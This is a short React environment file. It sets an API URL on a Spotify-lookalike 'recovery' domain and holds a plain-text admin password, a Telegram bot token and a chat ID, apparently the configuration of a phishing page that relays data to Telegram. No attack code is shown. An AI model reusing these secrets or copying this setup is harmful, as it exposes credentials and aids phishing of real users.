REACT_APP_API_URL=https://spotify-recovery.com
REACT_APP_ADMIN_PASSWORD="0000210000"
REACT_APP_TELEGRAM_BOT_TOKEN=7319238706:AAHwBldLgqm_-nfLEwy692C-vMAzJR60mVU
REACT_APP_TELEGRAM_CHAT_ID=-4676475206
